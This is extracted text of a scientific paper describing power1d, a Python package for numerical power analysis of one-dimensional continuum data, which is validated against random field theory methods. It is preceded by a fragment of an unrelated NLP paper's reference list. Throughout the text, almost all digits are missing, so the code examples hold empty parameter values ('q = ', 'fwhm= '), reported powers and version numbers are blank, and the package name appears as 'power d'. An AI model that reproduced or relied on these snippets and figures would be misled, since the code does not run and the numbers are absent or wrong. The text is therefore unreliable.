gershman, and car- los ramirez. . resources for the detection of conventionalized metaphors in four languages. in proceedings of the th international conference on language resources and evaluation (lrec ), pages – . european language re- sources association, reykjavik, iceland. roger levy and galen andrew. . tregex and tsurgeon: tools for querying and manipulating tree data structures. in proceedings of the th inter- national conference on language resources and evaluation (lrec ), pages – . eu- ropean language resources association, genoa, italy. mitchell marcus, grace kim, mary ann marcinkiewicz, robert macintyre, ann bies, mark ferguson, karen katz, and britta schas- berger. . the penn treebank: annotating predicate argument structure. in proceedings of the workshop on human language technol- ogy, hlt ’ , pages – . association for computational linguistics, plainsboro, nj. paramita mirza and sara tonelli. . an analysis of causality between events and its relation to tem- poral information. in proceedings of the th inter- national conference on computational linguistics (coling ), pages – . dublin city university and association for computational lin- guistics, dublin, ireland. nasrin mostafazadeh, alyson grealish, nathanael chambers, james allen, and lucy vanderwende. . caters: causal and temporal relation scheme for semantic annotation of event structures. in proceedings of the th workshop on events: definition, detection, coreference, and represen- tation, pages – . association for computa- tional linguistics, san diego, ca. joakim nivre, marie-catherine de marneffe, filip ginter, yoav goldberg, jan hajic, christopher d. manning, ryan mcdonald, slav petrov, sampo pyysalo, natalia silveira, reut tsarfaty, and daniel zeman. . universal dependencies v : a multilingual treebank collection. in proceedings of the th international conference on language resources and evaluation (lrec ). european language resources association, portoro, slove- nia. martha palmer, daniel gildea, and paul kingsbury. . the proposition bank: an annotated cor- pus of semantic roles. computational linguistics, ( ): – . fabian pedregosa, gaël varoquaux, alexandre gram- fort, vincent michel, bertrand thirion, olivier grisel, mathieu blondel, peter prettenhofer, ron weiss, vincent dubourg, jake vanderplas, alexan- dre passos, david cournapeau, matthieu brucher, matthieu perrot, and édouard duchesnay. . scikit-learn: machine learning in python. journal of machine learning research, : – . rashmi prasad, nikhil dinesh, alan lee, eleni milt- sakaki, livio robaldo, aravind joshi, and bonnie webber. . the penn discourse treebank . . in proceedings of the th international conference on language resources and evaluation (lrec ), pages – . european language re- sources association, marrakech, morocco. michael roth and mirella lapata. . context- aware frame-semantic role labeling. transactions of the association for computational linguistics, : – . evan sandhaus. . the new york times anno- tated corpus. linguistic data consortium. jonathan schaffer. . the metaphysics of causation. in edward n. zalta, editor, the stanford encyclopedia of philosophy. summer edition. http://plato.stanford. edu/archives/sum /entries/ causation-metaphysics/. nathan schneider, jena d. hwang, vivek srikumar, meredith green, abhijit suresh, kathryn conger, tim o’gorman, and martha palmer. . a cor- pus of preposition supersenses. in proceedings of the th linguistic annotation workshop (law x), pages – . association for computational linguistics, berlin, germany. nathan schneider, vivek srikumar, jena d. hwang, and martha palmer. . a hierarchy with, of, and for preposition supersenses. in proceedings of the th linguistic annotation workshop (law ix), pages – . association for computational linguistics, denver, co. karin k. schuler. . verbnet: a broad- coverage, comprehensive verb lexicon. ph.d. thesis, university of pennsylvania, philadelphia, pa. aai . noah a. smith, claire cardie, anne washington, and john wilkerson. . overview of the nlp unshared task in poliinformatics. in proceedings of the acl workshop on language tech- nologies and computational social science, pages – . association for computational linguistics, baltimore, md. rion snow, daniel jurafsky, and andrew y. ng. . learning syntactic patterns for automatic hyper- nym discovery. in advances in neural information processing systems (nips ), pages – . mit press, vancouver, canada. luc steels, editor. . computational issues in fluid construction grammar. lecture notes in computer science. springer verlag, berlin, ger- many. oscar täckström, kuzman ganchev, and dipanjan das. . efficient inference and structured learn- ing for semantic role labeling. transactions of the association for computational linguistics, : – . masaru tomita. . an efficient context-free pars- ing algorithm for natural languages. in proceed- ings of the th international joint conference on artificial intelligence (ijcai), volume , pages – . morgan kaufmann publishers inc., los angeles, ca. laure vieu, philippe muller, marie candito, and mar- ianne djemaa. . a general framework for the annotation of causality based on framenet. in pro- ceedings of the th international conference on language resources and evaluation (lrec ), pages – . european language resources association, portoro, slovenia. phillip wolff, bianca klettke, tatyana ventura, and grace song. . expressing causation in en- glish and other languages. in woo-kyoung ahn, robert l. goldstone, bradley c. love, arthur b. markman, and phillip wolff, editors, categoriza- tion inside and outside the laboratory: essays in honor of douglas l. medin, pages – . ameri- can psychological association, washington, dc. submitted april accepted june published july corresponding author todd c. pataky, tpataky@shinshu-u.ac.jp academic editor robert winkler additional information and declarations can be found on page doi . /peerj-cs. copyright pataky distributed under creative commons cc-by . open access power d: a python toolbox for numerical power estimates in experiments involving one-dimensional continua todd c. pataky institute for fiber engineering, shinshu university, ueda, japan abstract the unit of experimental measurement in a variety of scientific applications is the one-dimensional ( d) continuum: a dependent variable whose value is measured repeatedly, often at regular intervals, in time or space. a variety of software packages exist for computing continuum-level descriptive statistics and also for conducting continuum-level hypothesis testing, but very few offer power computing capabilities, where ‘power’ is the probability that an experiment will detect a true continuum signal given experimental noise. moreover, no software package yet exists for arbitrary continuum-level signal/noise modeling. this paper describes a package called power d which implements (a) two analytical d power solutions based on random field theory (rft) and (b) a high-level framework for computational power analysis using arbitrary continuum-level signal/noise modeling. first power d’s two rft-based analytical solutions are numerically validated using its random continuum generators. second arbitrary signal/noise modeling is demonstrated to show how power d can be used for flexible modeling well beyond the assumptions of rft-based analytical solutions. its computational demands are non-excessive, requiring on the order of only s to execute on standard desktop computers, but with approximate solutions available much more rapidly. its broad signal/noise modeling capabilities along with relatively rapid computations imply that power d may be a useful tool for guiding experimentation involving multiple measurements of similar d continua, and in particular to ensure that an adequate number of measurements is made to detect assumed continuum signals. subjects scientific computing and simulation, programming languages keywords gaussian random fields, time series, random field theory, hypothesis testing, computational statistics, data modeling introduction analyzing multiple measurements of one-dimensional ( d) continua is common to a variety of scientific applications ranging from annual temperature fluctuations in climatology (fig. ) to position trajectories in robotics. these measurements can be denoted y(q) where y is the dependent variable, q specifies continuum position, usually in space or time, and where the continua are sampled at q discrete points. for the climate data depicted in fig. y is temperature, q is day and q= . measurements of y(q) are often: (i) registered and (ii) smooth. the data are ‘registered’ in the sense that point q is homologous across multiple continuum measurements. how to cite this article pataky ( ), power d: a python toolbox for numerical power estimates in experiments involving one- dimensional continua. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:tpataky@shinshu-u.ac.jp mailto:tpataky@shinshu-u.ac.jp https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. day te m pe ra tu re ( de g c) (a) day (b) arctic atlantic continental pacific figure canadian temperature data (ramsay & silverman, ). (a) all measurements. (b) means (thick lines) and standard deviations (error clouds). dataset download on march from: http:// www.psych.mcgill.ca/misc/fda/downloads/fdafuns/matlab/fdamatlab.zip (./examples/weather) registration implies that it is generally valid to compute mean and variance continua as estimators of central tendency and dispersion (friston et al., ). that is, at each point q the mean and variance values are computed, and these form mean and variance continua (fig. b) which may be considered unbiased estimators of the true population mean and variance continua. the data are ‘smooth’ in the sense that continuum measurements usually exhibit low frequency signal. this is often a physical consequence of the spatial or temporal process which y(q) represents. for example, the earth’s rotation is slow enough that day-to-day temperature changes are typically much smaller than season-to-season changes (fig. a). regardless of the physical principles underlying the smoothness, basic information theory in fact requires smooth continua because sufficiently high measurement frequency is needed to avoid signal aliasing. this smoothness has important statistical implications because smoothness means that neighboring points (q and q+ ) are correlated, or equivalently that adjacent points do not vary in a completely independent way. thus, even when q separate values are measured to characterize a single continuum, there may be far fewer than q independent stochastic units underlying that continuum process. the canadian temperature dataset in fig. exhibits both features. the data are naturally registered because each measurement station has one measurement per day over q= days. the data are smooth because, despite relatively high-frequency day-to-day temperature changes, there are also comparatively low-frequency changes over the full year and those low-frequency changes are presumably the signals of interest. having computed mean and variance continua it is natural to ask probabilistic questions regarding them, and two basic kinds of probability questions belong to the categories: (i) classical hypothesis testing and (ii) power analysis. continuum-level hypothesis testing has been well-documented in the literature (friston et al., ; nichols & holmes, ; pataky, ) but power has received comparatively less attention. while this paper focuses on power analysis it is instructive to first consider continuum-level hypothesis testing because those results are what power analysis attempts to control. pataky ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.psych.mcgill.ca/misc/fda/downloads/fdafuns/matlab/fdamatlab.zip http://www.psych.mcgill.ca/misc/fda/downloads/fdafuns/matlab/fdamatlab.zip http://dx.doi.org/ . /peerj-cs. day t v al ue test statistic continuum bonferroni threshold ( = . ) rft threshold ( = . ) uncorrected threshold ( = . ) figure two-sample hypothesis test comparing the atlantic and continental regions from fig. . the test statistic continuum is depicted along with uncorrected, random field theory (rft)-corrected and bonferroni-corrected thresholds. continuum-level hypothesis testing classical hypothesis testing can be conducted at the continuum level using a variety of theoretical and computational procedures. in the context of the temperature data (fig. b) a natural hypothesis testing question is: is there is a statistically significant difference between the atlantic and continental mean temperature continua? answering that question requires a theoretical or computational model of stochastic continuum behavior so that probabilities pertaining to particular continuum differences can be calculated. one approach is functional data analysis (fda) (ramsay & silverman, ) which combines ‘basis functions’, or mathematically-defined continua, to model the data. since the basis functions are analytical, one can compute a variety of probabilities associated with their long-term stochastic behavior. a second approach is random field theory (rft) (adler & hasofer, ; hasofer, ) which extends gaussian behavior to the d continuum level via a smoothness parameter (kiebel et al., ) from which a variety of continuum level probabilities can be calculated (friston et al., ). a third approach is the non-parametric permutation method of nichols & holmes ( ) which, instead of modeling stochastic continuum behavior directly, instead constructs probability distributions through iterative computation. ultimately these and all other approaches, when used for classical hypothesis testing, offer a correction for multiple comparisons across the q continuum nodes based on continuum smoothness. example hypothesis testing results for the canadian temperature data are depicted in fig. . since there are mean and variance continua it is trivial to compute the test statistic continuum, here as the two-sample t statistic representing the variance-normalized pataky ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. difference between the atlantic and continental regions. the next step is less trivial: finding the critical test statistic threshold. the threshold is meant to represent the value above which purely random test statistic continua (i.e., those produced by random continua when the true continuum difference is null) would traverse in α percent of an infinite number of experiments, where α is the type i error rate and is usually . . of the three thresholds depicted in fig. only one (the rft threshold) is a true continuum-level threshold. the other two depict nappropriate thresholds as references to highlight the meaning of the rft threshold. in particular, the uncorrected threshold (α= . ) is ‘uncorrected’ because it presumes q= ; since q= for these data it is clearly inappropriate. on the other extreme is a bonferroni threshold which assumes that there are q completely independent processes. it is a ‘corrected’ threshold because it acknowledges that q> , but it is inappropriate because it fails to account for continuum smoothness, and thus overestimates the true number of stochastic processes underlying these data. the third method (rft) is also a ‘corrected’ threshold, and it is closest to the true threshold required to control α because it considers both q and smoothness friston et al. ( ). specifically, it assesses inter-node correlation using the d derivative (kiebel et al., ) to lower the estimated number of independent processes, which in turn lowers the critical threshold relative to the bonferroni threshold. this rft approach is described extensively elsewhere friston et al. ( ) and has also been validated extensively for d continua (pataky, ). for this particular dataset the test statistic continuum crosses all three thresholds, implying that the null hypothesis of equivalent mean continua is rejected regardless of correction procedure. if the continuum differences are not as pronounced as they are here, especially near the start and end of the calendar year, the correction procedure would become more relevant to interpretation objectivity. continuum-level power analysis before conducting an experiment for which one intends to conduct classical hypothesis testing it is often useful to conduct power analysis, where ‘power’ represents the probability of detecting a true effect. the main purposes of power analysis are (a) to ensure that an adequate number of measurements is made to elucidate a signal of empirical interest and (b) to ensure that not too many measurements are made, in which case one risks detecting signals that are not of empirical interest. the balance point between (a) and (b) is conventionally set at a power of . , and that convention is followed below. the literature describes two main analytical approaches to continuum-level power analysis: (i) inflated variance (friston et al., ) and (ii) noncentral rft (hayasaka et al., ; mumford & nichols, ; joyce & hayasaka, ). the inflated variance method models signal as smooth gaussian noise (fig. a) which is superimposed upon gaussian noise with different amplitude and smoothness. the non-central rft approach models signal as a constant mean shift from the null continuum (fig. b). since both techniques are analytical power calculations can be made effectively instantaneously. however, both techniques are limited by simple signal models and relatively simple noise models. in reality pataky ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. continuum position (%) d ep en de nt v ar ia bl e (a) inflated variance noise signal continuum position (%) (b) non-central rft continuum position (%) (c) numerical figure continuum-level power analysis methods. (a) friston et al. ( ). (b) hayasaka et al. ( ) and mumford & nichols ( ). (c) this paper’s proposed computational method. rft= random field theory. the signal can be geometrically arbitrary and the noise can be arbitrarily complex (fig. c). currently no analytical methods exist for arbitrary signal geometries and arbitrary noise. the purpose of this study was to develop a computational approach to continuum-level power analysis that permits arbitrary signal and noise modeling. this paper introduces the resulting open-source python software package called power d, describes its core computational components, and cross-validates its ultimate power results with results from the two existing analytical methods (inflated variance and non-central rft). source code, html documentation and scripts replicating all results in this manuscript are available at http://www.spm d.org/power d. software implementation power d was developed in python . (van rossum, ) using anaconda . (continuum analytics, ) and is also compatible with python . . its dependencies include python’s standard numerical, scientific and plotting packages: • numpy . (van der walt, colbert & varoquaux, ). • scipy . (jones, oliphant & peterson, ). • matplotlib . (hunter, ). other versions of these dependencies are likely compatible but have not been tested thoroughly. the package is organized into the following modules: • power d.geom— d geometric primitives for data modeling. • power d.models—high-level interfaces to experiment modeling and numerical simulation. • power d.noise— d noise classes including mixtures, signal-dependent and compound classes. • power d.prob—analytical probabilities for central and noncentral t and f fields. • power d.random—smooth d gaussian field generation. • power d.roi—regions-of-interest (rois) for geometric hypothesis constraints. • power d.stats—standard t and f computations for continua. pataky ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.spm d.org/power d http://dx.doi.org/ . /peerj-cs. details regarding the contents and capabilities of each module are provided in power d’s documentation (http://www.spm d.org/power d) and are summarized below, building to a model and ultimately a power analysis of the canadian temperature dataset above (fig. ). geometry (power d.geom) basic geometries can be constructed and visualized as follows: import power d q = y = power d.geom.gaussianpulse( q , q= , fwhm= , amp= . ) y.plot() here q is the continuum size, q is the continuum position at which the gaussian pulse is centered, fwhm is the full-width-at-half-maximum of the gaussian kernel, and amp is its maximum value (fig. ). all of power d’s geometric primitives have a similar interface and are depicted in fig. . more complex geometries can be constructed using standard python operators as follows (see fig. ). import power d q = y = power d.geom.gaussianpulse( q , q= , fwhm= , amp= ) y = power d.geom.sinusoid( q , amp= , hz= ) ya = y + y yb = y * y yc = y ** y noise (power d.noise) continuum-level noise objects can be constructed and visualized as follows: from matplotlib import pyplot import power d j = q = n = power d.noise.gaussian( j , q , mu= , sigma= ) n = power d.noise.smoothgaussian( j , q , mu= , sigma= , fwhm= ) ax = pyplot.subplot( ) ax = pyplot.subplot( ) n .plot( ax=ax ) n .plot( ax=ax ) pataky ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.spm d.org/power d http://dx.doi.org/ . /peerj-cs. continuum position . . . . . . . co nt in uu m v al ue figure example gaussianpulse geometry. here j is sample size and is a necessary input for all power d.noise classes. this code chunk results in the noise depicted in fig. . the smoothgaussian noise (fig. b) represents residuals observed in real datasets like those depicted implicitly in fig. a. for this smoothgaussian noise model the fwhm parameter represents the full-width-at-half- maximum of a gaussian kernel that is convolved with uncorrelated gaussian continua. rft describes probabilities associated with smooth gaussian continua (fig. b) and in particular the survival functions for test statistic continua (friston et al., ; pataky, ). all power d noise models are depicted in fig. . compound noise types are supported including additive, mixture, scaled and signal-dependent. as an example, the additive noise model depicted in fig. h can be constructed as follows: n = power d.noise.gaussian( j , q , mu= , sigma= . ) n = power d.noise.smoothgaussian( j , q , mu= , sigma= . , fwhm= ) n = power d.noise.additive ( noise , noise ) all noise models use the random method to generate new random continua, and all store the current continuum noise in the value attribute, and all number generation can be controlled using numpy’s random.seed method as follows: np.random.seed( ) j = q = noise = power d.noise.gaussian ( j , q , mu= , sigma= ) print( noise.value[ , : ] ) pataky ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. co nt in uu m v al ue (a) continuum d (b) constant (c) exponential (d) exponentialsaw (e) gaussianpulse co nt in uu m v al ue (f) linear (g) null (h) sawpulse (i) sawtooth (j) sigmoid continuum position co nt in uu m v al ue (k) sinusoid continuum position (l) squarepulse continuum position (m) squaretooth continuum position (n) trianglepulse continuum position (o) triangletooth figure all geometric primitives. the continuum d primitive accepts an arbitrary d array as input, and all other primitives are parameterized. (a) continuum d, (b) constant, (c) exponential, (d) exponentialsaw, (e) gaussianpulse, (f) linear, (g) null, (h) sawpulse, (i) sawtooth, (j) sigmoid, (k) sinusoid, (l) squarepulse, (m) squaretooth, (n) trianglepulse, (o) triangletooth. continuum position . . . . . co nt in uu m v al ue (a) y y continuum position (b) ya = y + y yb = y * y yc = y ** y figure (a) two example geometric primitives. (b) python operators used to construct complex ge- ometries from primitives. noise.random() print( noise.value[ , : ] ) np.random.seed( ) noise.random( ) print( noise.value [ , : ] ) pataky ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. continuum position co nt in uu m v al ue (a) continuum position (b) figure (a) uncorrelated gaussian noise. (b) smooth (correlated) gaussian noise. co nt in uu m v al ue (a) constantuniform (b) constantgaussian (c) uniform (d) gaussian (e) skewed co nt in uu m v al ue (f) smoothgaussian (g) smoothskewed continuum position co nt in uu m v al ue (h) additive continuum position (i) mixture continuum position (j) scaled continuum position (k) signaldependent figure all noise models. (a–e), (f–g) and (h–k) depict basic, smooth and compound noise types, respectively. the first, second and third print commands display the following results: [ . . . ] [ - . . . ] [ . . . ] this emphasizes control over power d’s random values via np.random.seed. pataky ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. continuum position co nt in uu m v al ue (a) noise mean continuum position (b) figure data sample model. (a) and (b) depict two separate samples generated using a single datasam- ple object. data sample and experiment models (power d.models) in this section the terms ‘‘datasample’’ and ‘‘data sample’’ refer to the object class: power d.models.datasample and a numerical instantiation of that class, respectively. datasample objects have three components: (a) baseline, (b) signal and (c) noise. the first two are power d.geom objects and the last is a power d.noise object. datasample objects, like noise objects, use random to generate new random data samples as follows: j = q = baseline = power d.geom.null( q ) signal = power d.geom.gaussianpulse( q , q= , fwhm= , amp= ) noise = power d.noise.smoothgaussian( j , q , mu= , sigma= , fwhm= ) model = power d.models.datasample( baseline , signal , noise ) model.plot() model.random() model.plot() two such data samples constructed in this manner are depicted in fig. . any geometry object and any noise object can be combined to form a datasample object. the purpose of the baseline object is to provide a visual reference when constructing datasample models. for example, the atlantic temperature data from fig. a could be modeled with the experimentally observed mean as follows: data = power d.data.weather() y = data[ " continental " ] j = pataky ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. continuum position co nt in uu m v al ue (a) noise mean continuum position (b) figure data sample model using experiment mean from the continental data in fig. . (a) and (b) depict two separate randomly generated samples. q = baseline = power d.geom.continuum d( y.mean( axis= ) ) signal = power d.geom.null( q ) n = power d.noise.gaussian( j , q , mu= , sigma= . ) n = power d.noise.smoothgaussian( j , q , mu= , sigma= , fwhm= ) noise = power d.noise.additive( n , n ) model=power d.models.datasample( baseline , signal , noise , j=j ) model.plot() model.random() model.plot() the first command loads the canadian temperature (or ‘weather’) data as a python dictionary. the second extracts just the continental data. next the experimental mean is used to create a continuum d baseline object, and a null signal object is also created. the next three lines create an additive noise model which contains both high- and low- frequencies. subsequently a datasample model is created with the sample size j. the results of this code chunk are depicted in fig. . the baseline component of datasample objects have no effect on subsequently described power calculations, which are based on the signal and noise components. the baseline component is included for two reasons: (a) to visually guide datasample construction, and (b) to permit hypothesis-relevant calculations. for example, one’s hypothesis may pertain to a function of the continua like their cumulative integral rather than to the originally measured continua themselves. in that case the baseline’s magnitude as well as its positive and negative regions could be important for test statistic computation. pataky ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. once a data sample model is constructed it can be routed into an experiment model for simulation as follows: j = q = baseline = power d.geom.null( q ) signal = power d.geom.gaussianpulse( q , q= , fwhm= , amp= ) noise = power d.noise.smoothgaussian( j , q , mu= , sigma= , fwhm= ) model = power d.models.datasample( baseline , signal , noise , j=j ) teststat = power d.stats.t_ sample emodel = power d.models.experiment( model , teststat ) emodel.simulate( ) pyplot.plot( emodel.z.t , color="k" , linewidth= . ) here teststat is a function that computes the one-sample t statistic continuum. the experiment model contains both a datasample model and a test statistic computer. once the simulate method is called, a random data sample is generated and the corresponding test statistic continuum is calculated and stored in the z attribute, in this case for a total of iterations. the resulting test statistic continua are depicted in fig. . since test statistic continua can be numerically generated in this manner for arbitrary datasample and experiment models, it follows that power analysis can be numerically conducted by comparing two experiment models, one representing the null hypothesis (which contains null signal) and one representing the alternative hypothesis (which contains the signal one wishes to detect). power d provides a high-level interface to that two-experiment comparison through its experimentsimulator object as demonstrated below: j = q = baseline = power d.geom.null( q ) signal = power d.geom.null( q ) signal = power d.geom.gaussianpulse( q , q= , fwhm= , amp= ) noise = power d.noise.gaussian( j , q , mu= , sigma= ) model = power d.models.datasample( baseline , signal , noise , j=j ) model = power d.models.datasample( baseline , signal , noise , j=j ) teststat = power d.stats.t_ sample emodel = power d.models.experiment( model , teststat ) pataky ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. continuum position te st s ta tis tic v al ue figure test statistic continua generated using an experiment model ( iterations). emodel = power d.models.experiment( model , teststat ) sim = power d.experimentsimulator( emodel , emodel ) results = sim.simulate( ) results.plot() note that the emodel and emodel objects represent null and a gaussian pulse signal, respectively, and thus represent the null and alternative hypotheses, respectively. the monte carlo simulation proceeds over , iterations (triggered by the simulate command) and completes for this example in approximately . s. the final results.plot command produces the results depicted in fig. . in this example the omnibus power is . (fig. a), implying that the probability of rejecting the null at at least one continuum location is . . this omnibus power should be used when the hypothesis pertains to the entire continuum because it embodies whole-continuum-level control of both false negatives and false positives. while the omnibus power is greater than . , the point-of-interest (poi) and center- of-interest (coi) powers are both well below . (fig. c ); see the fig. caption for a description of poi and coi powers. the poi power should be used if one’s hypothesis pertains to a single continuum location. the coi power should be used if the scope of the hypothesis is larger than a single point but smaller than the whole continuum. overall these results imply that, while the null hypothesis will be rejected with high power, it will not always be rejected in the continuum region which contains the modeled signal (i.e., roughly between continuum positions and ). this simple model thus highlights the following continuum-level power concepts: pataky ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. continuum position co nt in uu m v al ue (a) null --- p(reject)= . alternative --- p(reject)= . continuum position . . . . . . po w er null power continua (b) poi power coi power (radius= ) power datum continuum position . . . . . . alternative power continua (c) figure example power d results (α = . ). (a) depicts the two experiment models and the om- nibus power (p = . ). (b, c) depict power continua (b: null model, c: alternative model). the point- of-interest (poi) continuum indicates the probability of null hypothesis rejection at each continuum point. the center-of-interest (coi) continuum depicts the same but expands the search area to a cer- tain radius surrounding the poi, in this case with an arbitrary radius of three. thus the omnibus power is equivalent to the maximum coi power when the coi radius is q (i.e., the full continuum size). the in- tegral of the poi power continuum for the null model is α. powers of , . and are displayed as dotted lines for visual reference. • continuum-level signals can be modeled with arbitrary geometry. • continuum-level omnibus power does not necessarily pertain to the modeled signal. • the investigator must specify the scope of the hypothesis in an a priori manner (i.e., single point, general region or whole-continuum) and use the appropriate power value (i.e., poi, coi or omnibus, respectively). the model depicted in fig. is simple, and similar results could be obtained analytically by constraining the continuum extent of noncentral rft inferences (hayasaka et al., ). the advantages of numerical simulation are thus primarily for situations involving arbitrary complexities including but not limited to: multiple, possibly interacting signals, signal-dependent noise, covariate-dependent noise, unequal sample sizes, non-sphericity, etc. all of these complexities introduce analytical difficulties, but all are easily handled within power d’s numerical framework. pataky ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. regions of interest (power d.roi) the final functionality supported in power d is hypothesis constraining via region of interest (roi) continua. in practical applications, even when complete continua are recorded, one’s hypothesis does not necessarily relate to the whole continuum. for example, the canadian temperature example (fig. ) depict daily values collected for the whole year, but one’s hypothesis might pertain only to the summer months (approximately days – ). in this case it is probably most practical to model the entire year, but constrain the hypothesis to a certain portion of it as follows: data = power d.data.weather() y = data[ " continental " ] baseline = power d.geom.continuum d( y.mean ( axis= ) ) signal = power d.geom.null( q ) signal = power d.geom.gaussianpulse( q , q= , amp= , fwhm= ) n = power d.noise.gaussian( j , q , mu= , sigma= . ) n = power d.noise.smoothgaussian( j , q , mu= , sigma= , fwhm= ) noise = power d.noise.additive( n , n ) model = power d.models.datasample( baseline , signal , noise , j=j ) model = power d.models.datasample( baseline , signal , noise , j=j ) teststat = power d.stats.t_ sample emodel = power d.models.experiment( model , teststat ) emodel = power d.models.experiment( model , teststat ) sim = power d.experimentsimulator( emodel , emodel ) results = sim.simulate( ) roi = np.array( [ false ] * q ) roi[ : ] = true results.set_roi( roi ) results.set_coi_radius( ) results.plot() the code above models a maximum temperature increase of six degrees on day as a gaussian pulse with an fwhm of days, and constrains the hypothesis to days – via the set_roi method. the results in fig. depict the roi as blue background window and suggest that the omnibus power is close to . . setting the coi radius to the roi radius of via the set_coi_radius method emphasizes that the coi power continuum’s maximum is the same as the omnibus power. also note that, had an roi not been set, the roi is implicitly the entire continuum, in which case the omnibus power would have been pataky ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. continuum position co nt in uu m v al ue (a) null --- p(reject)= . alternative --- p(reject)= . continuum position . . . . . . po w er null power continua (b) poi power coi power (radius= ) power datum continuum position . . . . . . alternative power continua (c) figure example region of interest (roi)-constrained power results (α = . ). note that an coi radius of would raise the null coi power continuum to α. (a) depicts the two experiment models and the omnibus power (p= . ). (b, c) depict power continua (b: null model, c: alternative model). considerably lower at . . this emphasizes the fact that the critical threshold must be raised as the continuum gets larger in order to control for omnibus false positives across the continuum. these analyses, involving a more complex additive noise model and , iterations, required approximately s on a standard desktop pc. validations d power power d can be used for standard d (scalar) power assessments by setting an roi object to a single continuum point as follows. first set values for the main power-relevant parameters: alpha = . j = effect = . df = j - delta = effect * j ** . where alpha, df and delta are the type i error rate, degrees of freedom and noncentrality parameter, respectively. next compute power analytically: pataky ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. from scipy import stats u = stats.t.isf( alpha , df ) p = stats.nct.sf( u , df , delta ) where u is the critical threshold and where the power is p= . . to replicate this in power d one must create a model which replicates the assumptions underlying the analytical calculation above. in the code below a continuum size of q= is used because that is the minimum size that power d supports. q = baseline = power d.geom.null( q ) signal = power d.geom.null( q ) signal = power d.geom.constant( q , amp=effect ) noise = power d.noise.gaussian( j , q , mu= , sigma= ) model = power d.datasample( baseline , signal , noise , j=j ) model = power d.datasample( baseline , signal , noise , j=j ) last, simulate the modeled experiments and numerically estimate power: teststat = power d.stats.t_ sample emodel = power d.models.experiment( model , teststat ) emodel = power d.models.experiment( model , teststat ) sim = power d.experimentsimulator( emodel , emodel ) results = sim.simulate( ) roi = np.array( [ true , false ] ) results.set_roi( roi ) p = results.p_reject here power is given by the p_reject attribute of the simulation results (i.e., the probability of rejecting the null hypothesis in alternative experiment given the null and alternative models) and in this case the power is estimated as p= . . increasing the number of simulation iterations improves convergence to the analytical solution. repeating across a range of sample and effect sizes yields the results depicted in fig. . this power d interface for computing d power is admittedly verbose. nevertheless, as a positive point power d’s interface emphasizes the assumptions that underly power computations, and in particular the nature of the signal and noise models. d power: inflated variance method the inflated variance method (friston et al., ) models signal as a gaussian continuum with a particular smoothness and particular variance. power d does not support random signal modeling, but the inflated variance model can nevertheless be modeled using alternative noise models as demonstrated below. first all power-relevant parameters are set: j = pataky ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. . . . . . effect size . . . . . po w er j = j = j = figure validation of power d’s d power calculations. solid lines depict theoretical solutions from the noncentral t distribution and dots depict power d’s numerically simulated results ( , iterations each). q = df = j - alpha = . w = w = . sigma = . here w and w are the continuum smoothness values under the null and alternative hypotheses, respectively, and sigma is the effect size as the standard deviation of the ‘signal’ (i.e., noise) under the alternative. next the critical rft threshold can be computed using power d’s inverse survival function following friston et al. ( ) (eqn. , p. ) as follows: u = power d.prob.t_isf( alpha , df , q , w ) next the smoothness and threshold parameters are transformed according to friston et al. ( ) (eqns. – , p. ): s = sigma f = float( w ) / w wstar = w * ( ( + s ) / ( + s / ( + f ** ) ) ) ** . ustar = u * ( + s ) ** - . pataky ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. here s is the variance and f is the ratio of signal-to-noise smoothness. the probability of rejecting the null hypothesis when the alternative is true is given as the probability that random fields with smoothness w∗ will exceed the threshold u∗ (wstar and ustar, respectively), and where that probability can be computed using the standard rft survival function: p = power d.prob.t_sf( ustar , df , q , wstar ) here the analytical power is p= . . validating this analytical power calculation in power d can be achieved using a null signal and two different noise models as follows: baseline = power d.geom.null( q=q ) signal = power d.geom.null( q=q ) sg = power d.noise.smoothgaussian n = sg( q=q , sigma= . , fwhm=w , j=j ) n = sg( q=q , sigma= . , fwhm=wstar , j=j ) model = power d.models.datasample( baseline , signal , n , j=j ) model = power d.models.datasample( baseline , signal , n , j=j ) teststat = power d.stats.t_ sample emodel = power d.experiment( model , teststat ) emodel = power d.experiment( model , teststat ) sim = power d.experimentsimulator( emodel , emodel ) results = sim.simulate( ) p = results.sf( ustar ) the numerically estimate power is p= . , which is reasonably close to the analytical probability of . after just , iterations. repeating for background noise smoothness values of , and , sample sizes of , and and effect sizes ranging from σ = . to . yields the results depicted in fig. . close agreement between the theoretical and simulated power results is apparent. as noted by hayasaka et al. ( ) powers are quite low for the inflated variance approach because the signal is not strong; the ‘signal’ is effectively just a different type of noise. the noncentral rft approach described in the next section addresses this limitation. d power: noncentral rft method the noncentral rft method models signal as a constant continuum shift (hayasaka et al., ). like the inflated variance method above, it can by computed analytically in power d by first defining all power-relevant parameters: pataky ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. . . . . . . . effect size ( ) . . . . . 